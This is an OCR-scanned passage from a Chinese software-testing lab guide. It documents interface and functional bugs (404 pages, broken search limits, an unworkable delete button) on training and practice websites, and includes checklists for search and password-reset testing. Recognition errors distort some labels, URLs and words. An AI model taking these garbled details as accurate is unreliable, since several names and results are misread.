2.17 实验 #17: 微 信 公众 号 菜单 栏 名 称 与 实际 不 符 


缺陷 标题 “ 言 若 金 叶 微 信 公众 号 一 与 你 共 舞 一 高 校 学 生 区 ,链接 内 容 为 公众 号 使 用 
攻略 。 
测试 平台 Android 手机 微 信 平台 (设备 型 号 ; OPPO R9 Android 6.0), 
测试 步骤 
CD 扫描 言 若 金 叶 官网 (http://leaf520. roqisoft. com/) 左 侧 微 信 公 众 号 二 维 码 并 
关注 。 
(2) 进入 言 车 金 叶 微 信 公众 号 。 
(3) 点 击 底部 菜单 栏 中 的 “与 你 共 舞 ”。 
(4) 在 弹出 的 菜单 选项 中 点 击 “ 高 校 学 生 区 ”。 
(5) 查看 公众 号 推送 的 内 容 。 
期 望 结果 MAUNE METEEN: 
实际 结果 ”推送 内 容 为 “ 言 若 金 叶 公 众 号 -使 用 攻略 -绝招 大 放送 ”, 与 名 称 无 关 , 如 
图 2-23 所 示 。 
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图 2-23 “高 校 学 生 区 ”内容 与 选项 无 关 











EO 专家 点 评 


微 信 公众 号 的 设计 与 使 用 过 程 中 ,经 常会 出 现 有 的 菜单 选项 与 实际 内 容 不 符 。 链 接 错 
误 ,或 者 目前 链接 的 内 容 没 有 准备 好 ,所 以 链接 在 其 他 页 面 上 ,这 些 都 是 典型 的 错误 。 


实验 2 软件 界面 测试 训练 


2.18 ”实验 #18: 手机 上 二 维 码 与 网 站 文字 重 琶 


缺陷 标题 言 车 金 叶 微 信 公 众 号 一 言 车 金 叶 一 大 学 生 竞 赛 一 阅读 原文 ,二 维 码 图 片 与 
页 面 内 容 发 生 遮 挡 。 
测试 平台 Android 手机 微 信 平台 (设备 型 号 : OPPO R9 Android 6.0), 
测试 步骤 
CD 扫描 言 若 金 叶 官网 (http://leaf520. roqisoft. com/ ) 左 侧 微 信 公众 号 二 维 码 并 关注 。 
(2) 点 击 底部 菜单 栏 中 的 “ 言 若 金 叶 ”。 
(3) 在 弹出 的 菜单 选项 中 点 击 “ 大 学 生 竞赛 ”。 
(4) 点 击 公 众 号 回复 的 内 容 进 行 阅读 ,在 文 末 点 击 “ 阅 读 原文 ”。 
(5) 查看 页 面 显示 情况 。 
期 望 结果 ”原文 链接 页 面 显 示 正 常 。 
实际 结果 “原文 链接 页 面 中 ,二 维 码 图 片 与 页 面 文本 内 容 有 遮挡 ,如 图 2-24 所 示 。 
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实践 与 创新 龙 力 大 赛 
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手机 界面 测试 中 ,由 于 手机 的 显示 区 域 小 ,不 能 有 太 丰 富 的 展示 效果 ,所 以 要 求 设计 精 
简 而 不 失 表 现 力 ,测试 人 员 需 要 注意 界面 美观 和 简洁 度 的 测试 。 不 同型 号 的 手机 屏幕 大 小 
不 一 致 ,设置 形状 不 一 致 ,因此 需要 注意 测试 图 片 的 自 适 应 问题 界面 元 素 的 布局 问题 等 。 


2.19 实验 # 19:“ 专 家 简介 ”页 面 未 自 适应 手机 大 小 


缺陷 标题 ” 言 若 金 叶 微 信 公 众 号 一 “专家 简介 ?页面 ,手机 上 未 自 适应 缩放 
测试 平台 Android 手机 微 信 平台 (设备 型 号 : OPPO R9 Android 6.0). 
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测试 步骤 
CD 扫描 言 若 金 叶 官网 Chttp://leaf520. rogisoft. com/) 左 侧 微 信 公 众 号 二 维 码 并 
Xi. 
(2) 输入 “专著 ”, 点 击 回复 内 容 的 链接 http: //expert. rogisoft. com, 
(3) 观察 页 面 。 
期 望 结果 页 面 自 适应 缩放 ,显示 正常 大 小 。 
实际 结果 ”页面 放 大 , 需 手 动 缩放 为 正常 大 小 ,如 图 2-25 所 示 。 
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图 2-25 “专家 简介 ”页 面 ,手机 上 未 自 适应 缩放 
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参见 2. 18 3 XE # 18 的 专家 点 评 。 


2.20 实验 # 20: oricity 网 站 按钮 超出 界面 


缺陷 标题 oricity 网 站 主页 -联系 我 们 ”页 面 按钮 超出 界面 。 
测试 平台 与 浏览 器 Windows 8 十 Chrome 或 IE 10。 
测试 步骤 

(1) 用 Chrome/IE 打开 oricity 网 站 主页 http://www. oricity. com/。 

(2) 单 击 “ 联 系 我 们 ”, 网 址 为 http://www. oricity. com/user/contactus. php. 
期 望 结果 ”界面 布局 正常 合理 ,界面 友好 。 
实际 结果 ”界面 中 按钮 超出 页 面 ,界面 不 友好 ,如 图 2-26 所 示 。 


DS 专 家 点 评 


这 个 Bug 是 典型 的 按钮 设计 界面 问题 ,在 浏览 器 最 大 化 后 ,按钮 超出 了 正常 的 范围 , 显 
得 比较 突 元 ,不 美观 ,也 不 方便 操作 。 
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Hd 2-26 界面 不 友好 
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找 出 以 下 网 站 的 界面 问题 。 

CD 言 若 金 叶 软件 研究 中 心 网 : http://1eaf520. rogisoft. com. 

(2) 诺 顾 软 件 : http://www. roqisoft. com, 

(3) 诺 顾 软件 测试 团队 : http://qa. roqisoft. com. 

(4) 言 若 金 叶 精品 软件 著作 展示 官网 : http://books. roqisoft. com, 

(5) 言 若 金 叶 全 国 软件 工程 师 培训 官网 : http://training. roqisoft. com, 

(6) 言 若 金 叶 全 国 软件 工程 师 认 证 官网 : http://certificate. roqisoft. com, 

CD 诺 顾 电子 杂志 : http://jsebook. roqisoft. com, 

(8) 言 若 金 叶 在 线 免费 公开 课 : http://openclass. roqisoft. com, 

提醒 : 可 以 在 http://collegecontest. roqisoft. com/awardshow. html 中 查阅 历年 全 国 
高 校 大 学 生 在 这 些 网 站 中 发 现 的 更 多 界面 相关 的 缺陷 。 
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励志 名 句 : Living without an aim is like sailing without a compass. 


John Ruskin 
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功能 测试 (functional test) 是 对 产品 的 各 功能 进行 验证 ,根据 功 
能 测试 用 例 逐 项 测试 ,检查 产品 是 否 达 到 用 户 要 求 的 功能 。 功 能 测试 
也 称 黑 盒 测试 或 数据 驱动 测试 ,只 需 考虑 各 个 功能 ,不 需要 考虑 整个 
软件 的 内 部 结构 及 代码 。 

软件 功能 测试 训练 要 求 软件 测试 工程 师 对 软件 提供 的 各 种 功能 
逐一 进行 测试 , 切 不 可 认为 某 个 功能 很 简单 ,一 定 能 正常 工作 。 同 时 ， 
要 注意 组 合 情 况 下 ,边界 情况 下 的 功能 测试 。 


3.1 实验 #1: oricity 网 站 图 片 共享 出 现 404 
错误 


缺陷 标题 oricity 网 站 主页 一 个 人 空间 修改 资料 中 的 图 片 共享 
链接 出 现 404 错误 。 
测试 平台 与 浏览 器 ^ Windows 7 + Firefox 24.0 或 IE9 或 
Chrome 32.0。 
测试 步骤 
(1) 打开 oricity 网 站 http://www. oricity. comy 。 
(2) 以 有 效 的 用 户 信息 成 功 登 录 , 如 pyptester2( 如 果 没 有 账户 
可 以 注册 一 个 再 登录 ) 。 
G) 单 击 导 航 条 上 的 “[pyptester2] 的 城市 空间 "链接 ,进入 “我 
的 城市 空间 ”页 面 。 
(4) 展开 “我 的 账户 ”, 单 击 “ 个 人 资料 ”, 然 后 单 击 “ 个 人 资料 ” 
页 面 下 方 的 “图 片 共享 "图标, 如 图 3-1 所 示 。 
期 望 结果 页面 正常 显示 。 
实际 结果 ”出现 404 错误 ,网 页 未 找到 ,如 图 3-2 所 示 。 
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图 3-1 单 击 “ 图 片 共享 ”图标 


404: Page Not Found 


This page does not exist 





Want to start your own website? 
It's easier than you think! 





图 3-2 ”出现 404 错误 


DS 专家 点 评 


功能 测试 中 最 常 出 现 的 问题 是 链接 不 工作 、 按 钮 不 工作 ,这 些 也 是 初学 者 最 常 找 的 
Bug, 但 少 有 人 会 去 探究 链接 、 按 钮 为 什么 不 工作 。 做 测试 ,不 止 要 发 现 Bug, 如 果 能 找 出 原 
因 ,那么 会 更 容易 说 服 开发 者 ,这 是 做 好 测试 最 难得 的 一 个 习惯 。 

HTTP 404 错误 意味 着 链接 指向 的 网 页 不 存在 , 即 原始 网 页 的 URL 失效 ,这 种 情况 经 
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常会 发 生 , 很 难 避 免 。 例 如 ,网 页 URL 生成 规则 改变 、 网 页 文件 更 名 或 移动 位 置 、 导 入 链接 
拼写 错误 等 ,导致 原来 的 URL 地 址 无 法 访问 。 当 Web 服务 器 接 到 类 似 请 求 时 ,会 返回 一 个 
404 状态 码 , 告 诉 浏览 器 要 请 求 的 资源 并 不 存在 。 导 致 该 问题 的 原因 一 般 有 三 种 。 

(1) 无 法 在 所 请 求 的 端口 访问 Web 站 点 。 

(2) Web 服务 扩展 锁定 策略 阻止 本 请 求 。 

(3) MIME 映射 策略 阻止 本 请 求 。 


3.2 实验 #2;: 诺 顾 软件 论坛 高 级 搜索 十 约束 失效 


缺陷 标题 “ 诺 顾 软件 论坛 网 站 使 用 多 个 必须 存在 的 搜索 词 进行 高 级 搜索 ,搜索 结果 不 
准确 。 
测试 平台 与 浏览 器 ”Windows 10 十 Firefox。 
测试 步骤 
CD 打开 诺 顾 软 件 论 坛 网 站 http://leaf520. roqisoft. com/bbs/. 
(2) 单 击 “ 高 级 搜索 ”链接 。 
G) 按 关 键 词 在 搜索 框 内 输入 “十 重庆 十 大 学 ”, 如 图 3-3 所 示 。 
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E33 按 关键 词 在 搜索 框 内 输入 “十 重庆 十 大 学 ” 


(4) 观测 搜索 结果 。 
期 望 结果 ”只 有 同时 出 现 “ 重 庆 ” 和 “大 学 ”的 页 面 链接 才 会 出 现在 搜索 结果 中 。 
实际 结果 ”搜索 结果 中 有 一 些 链接 的 页 面 中 没有 “重庆 ”, 而 且 显 示 “ 重 “大 ”“ 学 "等 关 
键 字 被 忽略 ,如 图 3-4 所 示 。 
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图 3-4 返回 结果 不 满足 高 级 约束 条 件 


x 专家 点 评 


在 测试 搜索 查找 文本 框 等 功能 时 ,初学 者 习惯 测试 不 合法 内 容 , 比 如 字符 串 长 度 、 不 合 
法 字符 搜索 等 ,往往 会 忽略 正常 内 容 的 测试 ,这 是 Testcase 履 盖 不 全 面 的 原因 。 在 测试 之 
前 需要 测试 者 理 清 一 个 完整 的 思路 , 拟 出 最 基本 的 Testcase 覆盖 ,以 保证 测试 更 全 面 。 养 
成 测试 前 先 思 考 的 好 习惯 ,能 较 快 地 提升 测试 能 力 。 

1. 功能 实现 

(1)“ 搜 索 ” 按 钮 功能 是 否 实现 。 

(2) 单 击 “ 搜 索 ” 按 钮 后 ,原先 的 搜索 条 件 或 默认 值 是 否 自动 清空 。 

(3) 注意 验证 搜索 框 的 功能 是 否 与 需求 一 致 , 即 是 模糊 搜索 ,还 是 完全 搜索 。 如 果 支 持 
模糊 搜索 ,搜索 名 称 中 任意 一 个 字符 ,要 能 搜索 到 ; 如 果 支 持 完全 搜索 , 单 击 “搜索 ”按钮 , 查 
询 结果 正确 。 

(4) 比较 长 的 名 称 是 否 能 查 到 。 输 入 过 长 查询 数据 ,看 其 有 无 判断 ; 是 否 报错 ; 系统 是 
否 会 截取 克 许 的 长 度 来 检索 结果 ; 是 否 只 能 输入 允许 的 字符 串 长 度 。 

(5) 空 ,默认 查询 条 件 结 果 集 。 

(6) 仅 输 入 空格 ,看 看 能 不 能 执行 搜索 。 

(7) 是 否 有 和 忽略 首尾 空格 的 功能 。 搜 索 框 需要 有 和 忽略 前 置 空格 和 后 置 空格 的 功能 ,但 
不 能 忽略 中 间 空 格 。 

(8) 输入 各 种 字符 ,如 输入 范围 是 0 一 9、A 一 Z, 测 试 输入 中 文 是 什么 效果 ; 测试 字符 
(尤其 是 英文 单 引号 ) 数字 、 特 殊 符 号 以 及 组 合 情 况 ; 测试 中 文 值 . 字 母 大 小 写 值 、 数 字 类 型 
值 、 全 角 半 角 值 等 。 

(9) 输入 系统 中 存在 的 与 之 匹配 的 条 件 ,看 其 查询 后 数据 的 完整 性 ; 测试 显示 记录 条 
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数 是 否 正确 ,文字 折 行 显示 是 否 正确 ,页 面 布局 是 否 美观 , 列 标题 项 、 列 显示 内 容 、 排 序 方式 
是 否 符合 需求 定义 ,搜索 出 的 结果 页 面 是 否 与 其 他 页 面 风格 一 致 。 

(10) 输入 系统 中 不 存在 与 之 匹配 的 条 件 ; 本 站 内 搜索 输入 域 中 不 输入 任何 内 容 , 是 否 
搜索 出 的 是 全 部 信息 或 者 给 予 提示 信息 。 

(OD 查询 结果 超过 一 页 是 否 可 以 下 滑 、 分 页 ,并 能 选中 。 

(12) 反复 输入 相同 的 数据 (5 次 以 上 ) 看 是 否 报错 。 

(13) 在 输入 结束 后 直接 按 Enter 键 ,看 系统 处 理 如 何 , 是 否 会 报错 。 

(14) 测试 敏感 词汇 ,提示 用 户 无 权限 等 信息 。 

2. 组 合 测试 

CD 在 不 同 查询 条 件 之 间 来 回 选择 ,是 否 出 现 页 面 错 误 ( 单 选 按钮 和 复 选 框 最 容易 
出 错 ) 。 

(2) 测试 多 个 查询 条 件 时 ,要 注意 查询 条 件 的 组 合 测试 ,可 能 不 同 组 合 的 测试 会 报错 。 

(3) 组 合 各 个 文本 域 查 询 条 件 , 单 击 “ 搜 索 ” 按 钮 ,查询 结果 是 否 正确 。 

(4) 多 个 关键 词 中 间 加 入 空格 .Tab、 过 号 后 ,验证 系统 的 结果 是 否 正确 。 

3. 其 他 测试 

(1) 在 输入 框 处 双击 是 否 出 现下 拉 菜 单 记忆 已 搜索 过 的 内 容 。 

(2) 在 输入 框 处 单 击 是 否 有 光标 出 现 ,以 便于 用 户 输入 。 

(3) 输入 正则 表达 式 。 

(4) 输入 select 查询 语句 、 插 入 语句 等 ,看 看 执行 结果 。 

(5) 输入 特殊 字符 、 转 义 符 .HTML 脚本 等 ,看 搜索 结果 返回 情况 。 

(6) 边界 值 验证 ,在 允许 的 字符 串 范围 内 外 ,验证 系统 的 处 理 。 


3.3 XU X3: qa 网 站 部 分 字体 放大 缩小 不 工作 


缺陷 标题 “ 诺 顾 软件 测试 团队 网 站 主页 的 字体 “放大 ”缩小 ”按钮 未 影响 全 部 页 面 
元 素 。 
测试 平台 与 浏览 器 ”Windows 7 十 IE 10 3X Chrome, 
测试 步骤 

(1) 打开 诺 顾 软件 测试 团队 网 站 主页 http://qa. rogisoft. com/。 

(2) 单 击 字 体 “ 放 大 ”或 “缩小 ”按钮 。 

(3) 在 网 站 主页 内 检查 每 一 项 元 素 。 
期 望 结果 ”每 一 项 元 素 都 是 随 单 击 次 数 放 大 或 缩小 的 。 
实际 结果 ”网 站 主页 内 部 分 内 容 未 随 单 击 次 数 放 大 ( 见 图 3-5) 或 缩小 ( 见 图 3-6) ,文字 
“ 言 若 金 叶 Golden Leaf 官方 标准 含义 ”下 方 的 文字 大 小 始终 不 变 。 


x 专家 点 评 


字体 放大 缩小 功能 是 对 整个 页 面 起 作用 ,如 果 对 部 分 页 面 不 起 作用 ,其 原因 应 该 是 开 
发 者 在 设计 改变 字体 大 小 时 漏 掉 了 局 部 Div. 
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图 3-5 单 击 8 次 字体 放大 后 效果 
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图 3-6 单 击 4 次 字体 缩小 后 效果 


Scl 3:4: leaf520 网 站 搜索 关键 字 长 度 验证 失效 


缺陷 标题 ”在 言 若 金 叶 软件 研究 中 心 网 站 使 用 小 于 搜索 关键 字 长 度 要 求 的 关键 字 能 够 
查看 搜索 结果 。 
测试 平台 与 浏览 器 ”Windows 7 十 IE 10 或 Chrome. 
测试 步骤 
CD 打开 言 若 金 叶 软件 研究 中 心 官网 http://leaf520. rogisoft. com, 
(2) 在 网 站 搜索 框 内 输入 数字 0.12, 


3.4 


(3) 观察 搜索 约束 所 起 的 作用 。 
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期 望 结果 搜索 结果 为 “搜索 字 串 必须 多 于 3 个 字符 且 少 于 20 个 字符 ”, 如 图 3-7 


所 示 。 
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图 3-7 输入 数字 12 后 的 搜索 结果 
实际 结果 ”搜索 结果 为 “总 共 搜 索 到 49 条 记录 ”, 如 图 3-8 所 示 。 
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3-8 输入 数字 0 后 的 搜索 结果 


x 专家 点 评 





在 搜索 框 中 输入 3 个 及 以 下 字符 进行 搜索 ,大 部 分 都 能 正常 给 出 错误 约束 提示 ,但 是 对 
于 0、 空格 等 ,可 能 会 有 异常 的 结果 出 现 。 这 也 是 在 考验 程序 员 所 编写 的 代码 是 否 足够 健 


壮 , 有 没有 能 绕 行 的 特定 输入 。 
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3.5 实验 #5: testphp 输入 框 中 的 默认 值 无 法 自动 删除 


缺陷 标题 acunetix acuart>artists>comment on this artist, 输 入 框 中 的 默认 值 无 法 
自动 删除 。 
测试 平台 与 浏览 器 Windows 8. 1 十 IE 11 或 Chrome 37.0。 
测试 步骤 
(1) 打开 acunetix acuart 主页 http://testphp. vulnweb. com/ 。 
(2) 单 击 导航 条 中 的 artists ,网址 为 http://testphp. vulnweb. com/artists. php。 
(3) 随意 单 击 一 条 ,如 单 击 comment on this artist。 
(4) 在 弹出 的 对 话 框 中 单 击 Name。 
期 望 结果 默认 值 自动 删除 。 
实际 结果 默认 值 无 法 自动 删除 ,如 图 3-9 所 示 ,只 能 手动 删除 。 








[Ere P c ERR [m B7 2 i 
fAacunetix EH 


home | categories | artists | disciaimer | your cart | guestbook | AJAX Derlo 





search art vetro 
Ce] 

comment on tis arist 
Browse categories 
Browse artists 
Your car a 
Sonup comment on ts arist 
Your proie 
Our guestbook Wee 
amenn comment on tes arist 
Links 
Secunty art 
Fractal 


About Us i Privacy Policy Contact Us 














图 3-9 输入 框 中 的 默认 值 单 击 后 无 法 自动 删除 


DS 专家 点 评 


网 页 上 用 到 表单 的 地 方 经 常会 起 到 这 样 的 效果 : 输入 框 中 上 默认 情况 下 会 有 一 段 引导 性 
文字 , 当 单 击 输入 框 时 引导 性 文字 会 被 删除 ; 当 输 入 框 失去 焦点 并 且 没 有 输入 内 容 时 ,再 次 
显示 引导 性 文字 。 

这 个 设计 的 初衷 是 为 了 方便 用 户 填写 数据 ,但 是 这 里 默认 值 无 法 自动 删除 ,需要 用 户 手 
动 删除 。 这 是 错误 的 设计 ,影响 用 户 体验 。 
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3.6 ”实验 #6: crackme 网 站 文件 无 法 下 载 


缺陷 标题 crackme 网 站 Net Banking 文件 无 法 下 载 。 
测试 平台 与 浏览 器 ”Windows 8.1 十 IE 11 或 Chrome 37.0。 
测试 步骤 
(1) 打开 crackme 主页 http://crackme. cenzic. com, 
(2) 单 击 左边 导航 条 中 的 Net Banking, 进 入 网 页 http://crackme. cenzic. com/ 
Kelev/view/netbanking. php. 
(3) 在 新 的 页 面 单 击 Click Here To Download, 
(4) 查看 页 面 。 
期 望 结果 ”弹出 下 载 框 或 出 现下 载 页 面 。 
实际 结果 ”页面 无 任何 反应 ,如 图 3-10 所 示 。 


€ — © (crackmecenriccom/Kelev/Wew/netbanking php 











图 3-10 单 击 Click Here To Download 链接 无 任何 反应 


m 专家 点 评 NEN 


对 链接 比较 多 的 页 面 一 定 要 耐心 地 一 个 一 个 测试 ,不 能 因为 前 面 链接 全 都 能 正常 打开 
或 下 载 , 就 放弃 对 后 面 链接 的 测试 。 测 试 工作 一 定 要 全 面 到 位 ,不 能 走 任 何 捷径 。 

这 种 重复 性 的 手工 测试 ,也 可 以 用 测试 工具 代替 ,或 者 自己 开发 一 些 简单 的 测试 脚本 来 
测试 ,这 样 不 仅 可 以 节约 一 大 部 分 时 间 , 并 且 可 以 保证 测试 得 更 全 面 。 

例如 本 例 的 经 典 Bug, 可 以 开发 一 个 简单 的 脚本 ,由 脚本 来 帮助 操作 并 判断 页 面 是 否 正 
确 或 文档 是 否 存在 ,然后 等 待 脚本 运行 完 查 看 验证 结果 即 可 。 对 每 个 工具 统计 出 来 的 Bug， 
都 需要 手动 再 试 一 遍 , 看 能 否 复 现 。 

网 页 中 文档 经 常 找 不 到 的 原因 很 多 ,一 般 程 序 员 负责 写 页 面 与 功能 ,网 站 中 用 到 的 文档 
由 专门 的 文档 部 门 提供 。 文 档 部 门 没有 及 时 提供 文档 ,或 者 文档 更 新 改名 ,都 有 可 能 导致 广 
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iN 


档 无 法 下 载 。 
3.7 XU H7: testfire 网 站 About Us 页 出 现 404 错误 


缺陷 标题 testfire 网 站 About Us 页 面 出 现 404 错误 。 
测试 平台 与 浏览 器 Windows 7 十 Google 或 Firefox, 
测试 步骤 

(1) 打开 testfire 网 站 http://demo. testfire. net, 

(2) 单 击 左 方 链接 中 的 About Us 链接 。 

(3) 单 击 Points of Interest 链接 ,如 图 3-11 所 示 。 





) 








About Altoro Mutual 


Altoro Mutual offers a broad range of commercial, private, retail 
and mortgage banking services to small- and middle-market 
businesses and individuals. 


We pride ourselves on constantly surpassing the demands of our 
most loyal customers. And, we are determined to help you stay 
ahead of your expectations. That is our commitment to you. 


Wu 











图 3-11 单 击 Points of Interest 链接 
期 望 结果 ”出现 相 应 的 页 面 。 
实际 结果 ”出 现 404 错误 ,如 图 3-12 所 示 。 


© nA 


€ > Q |D demo.testfire.net/inside_points_of_interest.htm 





Server Error 





404 - File or directory not found. 


The resource you are looking for might have been removed, had its name changed, or is temporarily 
unavailable. 














3-12 出 现 404 错误 


实验 3 ”软件 功能 测试 训练 


LÀ 专家 点 评 


3.8 ”实验 #8: 景点 互动 的 360 全 景 展 示 中 返回 出 错 


缺陷 标题 智慧 绍兴 网 站 一 景点 互动 ~~360 全 景 展示 返回 功能 404 错误 。 
测试 平台 与 浏览 器 Windows 10 十 IE 11 或 Firefox. 
测试 步骤 

(1) 打开 智慧 绍兴 网 站 http://www. roqisoft. com/zhsx。 

(2) 单 击 导航 条 中 的 “景点 互动 ”>“360 全 景 展 示 ”。 

(3) 单 击 右 下 方 的 返回 箭头 按钮 ,如 图 3-13 所 示 。 











图 3-13 “全 景 展示 ”中 的 返回 箭头 按钮 


期 望 结果 ”正常 返回 相应 页 面 。 
实际 结果 ”出现 404 错误 ,参见 图 3-2, 


FOR 专家 点 评 


参见 3. 1 节 实 验 #1 的 专家 点 评 。 
3.9 XIR 9; leaf520 生成 PDF 出 现 TCPDF error 


缺陷 标题 ” 言 若 金 叶 官网 ~ 生成 PDF 出 现 TCPDF error: Unsupported image type. 
测试 平台 与 浏览 器 Windows 7 十 Chrome。 
测试 步骤 

CD 访问 言 若 金 叶 软件 研究 中 心 官 网 http://leaf520. rogisoft. com, 
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(2) 搜索 “世界 知识 产权 日 ”。 
(3) 单 击 查询 结果 中 的 “ 言 车 金 叶 软 件 研究 中 心 自主 软件 研发 国际 站 点 : 跨 地 域 合 


作 项 目 在 线 跟 踪 系 统 worksnaps” 文 章 标题 。 


(4) 在 内 容 页 单 击 PDF 图 标 。 


期 望 结果 生成 PDF 文件 。 
实际 结果 “出现 错误 页 “TCPDF error: Unsupported image type: png? 1366955347357". 
如 图 3-14 所 示 。 





A 


w #0 OE x 


© | © leafs20roqisoft com/index php? warticle&id «8120121224&atid «82011-01-21-02-32-48Autemid «39. 


oe Ej tum [S wmeemapsz. (| my Kd Soo RER EQ Google Scholar 























D) ats20 roqioftcomindes php Mews atideticalid 824201 
© leats20 roqisoft com/index php?view=articleRcatid=8%3A2011-01-21-02-32-4884=8183A201212; 


TCPDF error: Unsupported image type: png?1366955347357 


专家 点 评 










(iade — n x 





图 3-14 TCPDF error Ji ifii 





测试 网 站 其 他 没有 图 片 的 网 页 ,能 成 功 生 成 PDF 文件 ; 测试 其 他 有 图 片 的 网 页 ,大 部 
分 都 能 生成 PDF 文件 。 后 来 发 现 , 如 果 图 片 是 来 源 于 本 站 的 ,就 能 正确 生成 PDF 文件 ; 如 
果 图 片 是 外 站 的 链接 ,就 不 能 生成 PDF 文件 ,这 是 技术 实现 上 的 缺陷 。 

对 于 同一 个 网 站 的 PDF 功能 ,在 技术 实现 上 必须 统一 标准 ,不 管 网 页 内 容 是 否 有 图 片 ， 
不 管 这 些 图 片 来 自 哪里 ,都 能 生成 PDF 文件 ,并 且 样 式 也 要 一 样 。 这 里 出 错 可 能 是 IE 和 
Chrome 上 生成 PDF 文件 的 技术 实现 有 区 别 , 而 开发 人 员 没有 考虑 到 , 才 和 导致 IE 上 能 正常 
生成 PDF 文件 ,但 是 Chrome 上 某 些 地 方 不 可 以 。 这 些 问 题 开 发 人 员 在 开发 的 时 候 就 应 该 
从 多 方面 考虑 ,避免 这 种 Bug 出 现 。 


实验 3 ”软件 功能 测试 训练 NA 


3.10 SB £10: oricity 相册 目录 名 无 法 修改 


缺陷 标题 ”城市 空间 -我 的 相册 -图片 目录 ,修改 功能 无 法 使 用 。 
测试 平台 与 浏览 器 Windows 7 十 IE 11. 
测试 步骤 
(1) 打开 oricity 网 站 主页 http://www. oricity. com/ , 
(2) 登录 账号 。 
(3) 选择 “我 的 城市 空间 ”, 进 入 “我 的 相册 ”, 选 择 图 片 目录 , 单 击 已 有 分 组 后 面 的 编 
辑 “ 修 改 ” 链 接 。 
(4) 原先 目录 名 是 001 ,输入 新 的 目录 名 003, 如 图 3-15 所 示 。 


[chengshi123] 的 Wil | 广 外 轨迹 | 活动 发 布 | 部 市 日 历 | 都 市 相册 | 者 市 论 会 | 关于 我 们 | 回 到 主页 


















































图 3-15 ”修改 目录 名 为 003 


(5) 单 击 “确认 ”按钮 。 
HAAR 目录 名 修改 成 功 。 
实际 结果 ”目录 名 修改 失败 ,如 图 3-16 所 示 。 


Ichengsni123] 的 城市 空间 | 户外 轨迹 | 活动 发 布 | 都 市 日 历 | 都 市 相 内 | 都 市 论坛 | 关于 会 们 | 回 到 主 可 











2015-11-09 19:16 








[n.o] ac. en 











336 ”修改 失败 





ELIT) 


将 目录 名 修改 确认 以 后 ,目录 名 没有 改变 ,这 就 是 修改 功能 不 工作 的 表现 ,也 是 程序 员 
没有 做 好 最 基本 的 功能 测试 就 把 代码 发 布 到 系统 中 的 表现 。 


78 


Nf 


软件 测试 实验 实 训 指南 


作为 测试 人 员 ,需要 以 最 终 用 户 的 眼光 ,对 每 个 页 面 提供 的 功能 进行 验证 。 不 能 抱 侥幸 
心理 ,认为 简单 的 功能 一 定 是 正确 的 ,要 知道 ,即使 是 再 简单 的 一 个 字母 ,程序 员 也 有 可 能 因 
—W k g makas, 


3.11 实验 #11: crackme 网 站 忘记 密码 功能 未 实现 


缺陷 标题 crackme 网 站 中 Quick links 有 部 分 链接 功能 未 实现 。 
测试 平台 与 浏览 器 Windows 7 十 IE 11. 
测试 步骤 
(1) 直接 进入 crackme 网 站 的 登录 界面 http://crackme. cenzic. com/kelev/php/ 
login. php. 
(2) ñm Quick links 的 3 个 链接 :“Forgot your password?"" New user" " Benefits", 
期 望 结果 3 个 链接 均 有 效 , 且 能 链接 到 相应 的 页 面 。 
实际 结果 “Forgot your password?"" New user”Benefits” 链 接 功 能 均 未 实现 ,如 图 3-17 
所 示 。 
































3-17 ”链接 功能 未 实现 


DS 专家 点 评 


网 站 一 定 要 设计 忘记 密码 功能 ,否则 这 个 系统 只 能 称 为 演示 系统 ,不 是 真正 的 系统 ,不 
能 商业 化 运作 。 

忘记 密码 测试 一 般 分 为 3 个 部 分 : 输入 账户 ,获取 校 验 码 、 重 置 密码 。 

(1) 输入 账户 ,一 般 测试 以 下 几 项 。 

(D 输入 少 于 指定 位 数 或 错误 账户 时 是 否 有 相应 提示 。 

@ 输入 未 注册 账户 时 是 否 能 成 功 跳 转 ,或 有 相应 提示 。 

@ 输入 正确 账户 是 否 跳 转 成 功 。 

(D 能 否 输入 字母 .特殊 字符 、 空 格 。 

© 有 没有 二 次 验证 ,能 不 能 通过 忘记 密码 功能 修改 别人 的 账户 密码 。 





实验 3 ”软件 功能 测试 训练 


(2) 获取 校 验 码 ,一 般 测 试 以 下 几 项 。 

(D 如果 是 手机 验证 码 , 看 手机 能 否 收 到 验证 码 , 以 及 能 不 能 检验 成 功 。 

O 如 果 是 网 页 上 的 图 形 验 证 码 , 看 校 验 码 错误 时 是 否 有 相应 提示 。 

@ 校 验 码 发 送 频繁 时 ,看 是 否 有 相应 提示 。 

QD 输入 旧 的 验证 码 , 看 是 否 有 相应 提示 。 

(D 重 置 密码 。 测 试 与 平时 注册 时 密码 过 程 类 似 , 但 是 必须 充分 验证 是 合法 身份 , 才 允 
许 重 置 密码 ,否则 ,个 人 账户 就 容易 被 其 他 人 通过 忘记 密码 、 重 置 密码 方法 盗 取 。 

最 后 需要 注意 的 是 ,修改 完成 后 进行 以 下 测试 。 

(1) 用 旧 密 码 去 登录 看 能 否 登 录 成 功 。 

(2) 用 新 密码 去 登录 看 能 否 登 录 成 功 。 

(3) 登录 成 功 后 ,查看 网 站 中 个 人 数据 是 否 丢失 或 被 更 改 。 


3.12 XU X 12: testphp 网 站 产品 删除 功能 失效 


缺陷 标题 testphp 网 站 一 登录 -your cart 页 面 产品 删除 功能 失效 。 
测试 平台 与 浏览 器 Windows 7 十 Firefox 或 IE 11, 
测试 步骤 
(1) 打开 testphp 网 站 http: //testphp. vulnweb. com, 
(2) 单 击 左 侧 导航 条 中 的 Signup, 输 入 用 户 名 test, 密 码 test, 登 录 网 站 。 
(3) 单 击 上 侧 导航 条 中 的 Your cart, 然 后 单 击 delete 链接 。 
(4) 观察 页 面 元 素 。 
期 望 结果 内容 被 成 功 删 除 。 
实际 结果 ”内容 元 素 无 变化 ,如 图 3-18 Bros 。 





[$€ ii © testphp.vulnweb.com/cart.php?del=1 


facunetix ERTERHI 


home | categories | artists | disclaimer | your cart | guestbook | AJAX Demo 






Logout test 














Oot j P" Title Artist. Category. 
— En The shore — rdwBi73 Posters 
Browse categories 
m Total: $500 
| place a command for these items | 
Your cart =a 











图 3-18 产品 删除 功能 失效 


DS 专家 点 评 


这 里 的 delete 功能 不 工作 。 一 个 系统 中 如 果 删 除 功能 不 工作 ,将 会 导致 许多 垃圾 数据 
或 过 期 数据 无 法 清理 。 

大 家 见 过 论坛 ,如 果 论 坛 中 许多 广告 帖子 无 法 删除 ,那么 整个 网 站 很 快 就 成 广告 网 站 
了 。 所 以 ,程序 员 在 编写 程序 时 ,不 能 只 要 看 到 正 向 的 创建 能 成 功 ,就 不 再 验证 相关 的 修改 





NA 
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是 否 能 成 功 ,应 测试 删除 是 否 能 成 功 及 显示 是 否 正常 。 
